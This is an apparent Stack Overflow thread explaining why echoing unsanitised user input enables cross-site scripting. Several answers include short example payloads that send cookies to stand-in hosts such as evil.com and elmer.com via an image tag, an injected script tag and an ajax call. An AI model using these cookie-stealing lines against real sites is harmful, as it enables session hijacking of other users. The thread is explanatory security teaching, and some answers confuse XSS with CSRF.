# What harm can javascript do?

Tags: javascript, web-applications, security

I just happen to read the joel's blog [here](http://www.joelonsoftware.com/articles/Wrong.html)...

> So for example if you have a web page that says “What is your name?” with an edit box and then submitting that page takes you to another page that says, Hello, Elmer! (assuming the user’s name is Elmer), well, that’s a security vulnerability, because the user could type in all kinds of weird HTML and JavaScript instead of “Elmer” and their weird JavaScript could do narsty things, and now those narsty things appear to come from you, so for example they can read cookies that you put there and forward them on to Dr. Evil’s evil site.

Since javascript runs on client end.  All it can access or do is only on the client end.

1. It can read informations stored in hidden fields and change them.
2. It can read, write or manipulate cookies...

But I feel, these informations are anyway available to him. (if he is smart enough to pass javascript in a textbox.  So we are not empowering him with new information or providing him undue access to our server...

Just curious to know whether I miss something.  Can you list the things that a malicious user can do with this security hole.

**Edit : Thanks to all for enlightening .  As kizzx2 pointed out in one of the comments... I was overlooking the fact that a JavaScript written by User A may get executed in the browser of User B under numerous circumstances, in which case it becomes a great risk.**

Comment: I also think that the quoted example isn't really relevant to most of the JavaScript vulnerabilities today (CSRF, XSS, etc.). In particular, "those narsty things appear to come from you," sounds like the JavaScript would be executed on server side ("you"), which isn't true.

Answer (score 2, accepted):

There are answers that explain CSRF and XSS. I'm the one to say that for *the particular quoted passage*, there is no security threat at all.

That quoted passage is simple enough -- it allows you to execute some JavaScript. Congratulations -- I can do the same with Firebug, which gives me a command line to play with instead of having to fake it using a text box that some Web site gives me and I have to abuse it.

I really think Joel wasn't really sober when writing that. The example was just plain misleading.

*Edit* some more elaborations:

We should keep several things in mind:

1. Code cannot do any harm unless executed.
2. JavaScript can only be executed on client side (Yes there are server-side JavaScript, but apparently not in the context of this question/article)
3. If the user writes some JavaScript, which then gets executed on his own machine -- where's the harm? There is none, because he can execute JavaScript from Firebug anytime he wants without going through a text box.

Of course there are CSRF, which other people have already explained. The *only case* where there is a threat is where User A can write some code which gets executed in User B's machine.

Almost all answers that directly answer the question "What harm can JavaScript do?" explain in the direction of CSRF -- which requires User A being able to write code that User B can execute.

So here's a more complete, two part answer:

**If we're talking about the quoted passage, the answer is "no harm"**

I do not interpret the passage's meaning to mean something like the scenario described above, since it's *very obviously* talking about a basic "Hello, Elmer world" example. To *synthetically induce* implicit meanings out of the passage just makes it more misleading.

**If we're talking about "What harm can JavaScript do, in general," the answer is related to basic XSS/CSRF**

*Bonus* Here are a couple of more real-life scenarios of how an CSRF (User A writes JavaScript that gets exected on User B's machine) can take place

- A Web page takes parameters from `GET`. An attacker can lure a victim to visit `http://foo.com/?send_password_to=malicious.attacker.com`
- A Web page displays one user's generated content verbatim to other users. An attacker could put something likm this in his Avatar's URL: `<script>send_your_secret_cookies_to('http://evil.com')</script>` (this needs some tweaking to get pass quoting and etc., but you get the idea)

Comment: Except if it's reading that variable from a GET or POST, then there is a vulnerability. Let's say that the new URL is http://www.oursite.com/whatsyourname.php?username=Elmer but instead of Elmer, you put in your JavaScript and trick someone else into visiting that page with your link. You now have access to all of that user's cookies for that domain, even if the JavaScript isn't physically stored on their server.

Comment: @Nate Bundy that's right. That would have been a correct answer :P

Comment: I would like to accept your comment to OrangeDog's answer, on User A and User B... As you current answer is misleading without that comment,  Could you please include it, so that I can accept yours as the answer.

Comment: @The King OK, augmented the answer as requested :)

Answer (score 4):

[Cross Site Scripting](http://en.wikipedia.org/wiki/Cross-site_scripting) is a really big issue with javascript injection

Answer (score 3):

> It can read, write or manipulate cookies

That's the crucial part. You can steal cookies like this: simply write a script which reads the cookie, and send it to some evil domain using AJAX (with JSONP to overcome the cross domain issues, I think you don't even need to bother with ajax, a simple `<img src="http://evil.com/?cookieValue=123">` would suffice) and email yourself the authentication cookie of the poor guy.

Comment: But wont that poor guy be just you... How could you steel my cookie, when I retrieving the page from the server and filling the correct value (not any script) in the page.

Comment: @The King, I would send an email to the poor guy with a specially crafted URL pointing to your site and telling him to click because he has just won $1000, he will click on this link (remember he is a poor guy) and he will open your site where the value will be injected into the DOM because you didn't encode it. Now assuming the guy is authenticated on your site, my `<script>` tag will execute and steal his cookie and send it to me.

Comment: that's how a classic CSRF is executed. But if you read carefully the quoted passage I don't think it'd apply in this scenario.

Comment: @The king: An evil user writes a comment on a bad site. You visit the same bad site, and when your browser reads the page it get the comment that actually has some evil javascript in it. The evil javascript reads your cookies and send them to an evil site. Since you where logged in on your favorite sites that uses cookies for authentication, the evil user now has access to all those sites as you.

Answer (score 3):

I think what Joel is referring to in his article is that the scenario he describes is one which is highly vulnerable to [Script Injection attacks](http://en.wikipedia.org/wiki/Code_injection#HTML-script_injection_.28cross-site_scripting.29), two of the most well known of which are [Cross-Site Scripting (XSS)](http://en.wikipedia.org/wiki/Cross-site_scripting) and [Cross-Site Request Forgery (CSRF)](http://en.wikipedia.org/wiki/Cross-site_request_forgery).

Since most web sites use cookies as part of their authentication/session management solution, if a malicious user is able to inject malicious script into the page markup that is served to other users, that malicious user can do a whole host of things to the detriment of the other users, such as steal cookies, make transactions on their behalf, replace all of your served content with their own, create forms that imitate your own and post data to their site, etc, etc.

Comment: Yup... "Served to other users"...  But in this case, the page is not served to others, it is just served back to me...

Comment: @The King- I understand that his article doesn't mention other users, but I think this is what he is hinting at.

Answer (score 2):

- Cause your browser to sent requests to other services using your authentication details and then send the results back to the attacker.
- Show a big picture of a penis instead of your company logo.
- Send any personal info or login cookies to a server without your consent.

Comment: I'm sorry, its going over my head... Imagine you are trying to pass the image tag in the text box... The next page will just be seen by you... I (another user) who is going to pull the webpage from the server will only see the company logo.  Am I right? or I gross miss something.

Comment: "Cause your browser to send requests to other services using your authentication..." -- that's a security threat to _user_, not for the _server_. (Since this question is apparently talking about user vs. server rather than the other way around.) If the user wants to send requests to other services using his credentials -- he just need to do it himself without going through a text box.

Comment: @kizzx2 - It doesn't have to be sent to a different server, it could be sent to your server. Then its your security protocols and sensitive information that have been compromised. If you have a server with only the one page given in the example and nothing else, then there are no threats to the server via javascript injection.

Comment: 1) Code cannot do any harm unless executed. 2) JavaScript can only be executed on client side (ok I know about server side JS) 3) If the user writes some JavaScript, which then gets executed on his own machine -- where's the harm? Of course there are CSRF, which other people have already explained. The only case where there is a threat is User A can write some code which gets executed in User B's machine.

Comment: @kizzx2 - Which is the case that matters and the OP has overlooked, which is why we're all trying to draw their attention to it.

Answer (score 2):

I would look the wikipedia article on [javascript security](http://en.wikipedia.org/wiki/JavaScript#Security).   It covers a number of vulnerabilities.

Answer (score 2):

If you display data on your page that comes from a user without sanitizing that data first, it's a huge security vulnerability, and here's why:

Imagine that instead of "Hello, Elmer!", that user entered

```
<script src="http://a-script-from-another-site.js" type="text/javascript"></script>
```

and you're just displaying that information on a page somewhere without sanitizing it. That user can now do anything he wants to your page without other users coming to that page being aware. They could read the other users' cookie information and send it anywhere they want, they could change your CSS and hide everything on your page and display their own content, they could replace your login form with their own that sends information to any place they wish, etc. The real danger is when other users come to your site *after* that user. No, they can't do anything directly to your server with JavaScript that they couldn't do anyway, but what they can do is get access to information from other people that visit your site.

If you're saving that information to a database and displaying it, all users who visit that site will be served that content. If it's just content that's coming from a form that isn't actually saved anywhere (submitting a form and you're getting the data from a GET or POST request) then the user could maliciously craft a URL (oursite.com/whatsyourname.php?username=Elmer but instead of Elmer, you put in your JavaScript) to your site that contained JavaScript and trick another user into visiting that link.

For an example with saving information in a database: let's say you have a forum that has a log in form on the front page along with lists of posts and their user names (which you aren't sanitizing). Instead of an actual user name, someone signs up with their user name being a `<script>` tag. Now they can do anything on your front page that JavaScript will accomplish, and every user that visits your site will be served that bit of JavaScript.

Comment: This could be a threat if "Elmer" was _stored_ on server side and served to _other_ users. I think the question was referring to a simple scenario which gives the response right back to the original user. In that case, even if he put in a `<script>` tag, that's exactly the same as clicking on some bookmarklet -- which is harmless.

Comment: I feel this is extremely misleading. You're just assuming the entered code is saved and displayed for anyone to see. In the OPs example it is likely just being printed with JavaScript (i.e any XSS would be non-persistent)

Comment: I'm trying (and possibly failing) to address the greater point of why data sanitation is important. It really doesn't matter if it's saved in a database or comes from a GET or POST request; the important part is that that can now be shown to other users, whether it's by tricking them into visiting the site with a maliciously crafted URL or just visiting the normal site with the value coming from the database.

Comment: @kizzx2: If you consider that to be the question then yes, but if you consider "What is Joel Spolsky talking about in that article?" then the scenario assumes "Elmer" is stored on the server side and server to other users. In fact, I would say that serving content from one user to another user is exactly what the OP is missing from his understanding. Think Facebook.

Comment: @kizzx2: There, hopefully my edit with a distinction between saving to a database and POSTing a form should be more clear.

Comment: @slebetman: I just read that article... maybe my English is really not up to par, I just have an extremely difficult time bending the article's wordings to mean what you described :/ (Yes, that's how a typical CSRF is executed -- but must I read that article knowing what it's already about to say?)

Comment: @kizzx2: The article is about code smells (don't know if this was before or after he coined the term) so code that looks like it might allow XSS in any context *should* smell bad to a seasoned programmer. Actually, the article is specifically about enhancing code smell but it is about code smell none the less. A code that smells/looks bad should make you feel uncomfortable regardless of how safe the surrounding context is.

Answer (score 2):

Little example shown to me a while ago during XSS class..

Suppose Elmer is amateur hacker. Instead of writing his name in the box, he types this:

```
<script>$.ajax("http://elmer.com/save.php?cookie=" + document.cookie);</script>
```

Now if the server keeps a log of the values written by users and some admin is logging in and viewing those values..... Elmer will get the cookie of that administrator!

Answer (score 0):

Let's say a user would read your sourcecode and make his own tweak of for instance an ajax-call posting unwanted data to your server. Some developers are good at protecting direct userinput, but might not be as careful protecting database calls made from a ajax-call where the dev thinks he has control of all the data that is being sent trough the call.